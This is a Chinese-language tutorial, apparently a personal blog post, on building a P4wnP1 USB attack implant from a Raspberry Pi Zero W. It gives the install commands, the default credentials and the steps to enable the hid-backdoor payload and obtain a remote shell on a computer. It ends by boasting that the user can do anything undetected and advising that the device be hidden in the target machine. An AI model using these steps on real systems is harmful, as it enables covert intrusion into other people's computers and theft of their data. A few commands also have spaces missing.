一 准备工具:
pi zero w 约110元
zerokey拓展板 + 外壳 约30元
usb网卡转换头
如下图
镜像下载Raspbian镜像链接www.raspberrypi.org
注:这里有个kali的系统,更好用,烧录后直接使用,不同配置,登陆用户root 密码toorKali镜相链接build.nethunter.com
烧录好镜像后,启动系统
账号:pi
密码:raspberry
二 配置下载安装程序:
P4wnP1mame82/P4wnP1github.com
apt-get update
sudo apt-getupdate
sudo apt-getinstall git john
git clone –recursive http://github.com/mame82/P4wnP1
下载完成后,进行安装
cd P4wnP1/
./install.sh
安装时,需要连接网络,需要插入网卡,安装时间挺长的,看会电影
安装完成后,关闭系统
sudo shutdown now
拔下树莓派,插入电脑中,此时树莓派会生成wifi信号,
名字P4wnP1
密码MaMe82-P4wnP1
用手机链接到wifi,配置ssh
ssh连接的地址是172.24.0.1账号和密码还是树莓派的初始密码
如下
(下面用的kali的那个镜像演示的)
连接后
进入P4wnP1中执行
nano setup.cfg
选择payload(选择哪个,就把那个前面的#去掉)
我选的时hid-backdoor
保存后关机,插入电脑,手机ssh连接后会出现下面这样
第一步执行FireStage1
相当于获取一个连接的会话
如下图:执行之后下面会变成 client connected
一般要设置键盘语言选项 输入SetKeyboardLanguage
如下图 选择us
输入help 查看帮助
有很多的功能:键盘,鼠标注入,上传,下载文件,劫持数据等等
我测试使用的是shell 直接拿到电脑的shell
哈哈,为所欲为,还不会被发现
前提是:
你将pi插入了电脑,
并将这个小家伙给隐藏好ԅ(¯ㅂ¯ԅ)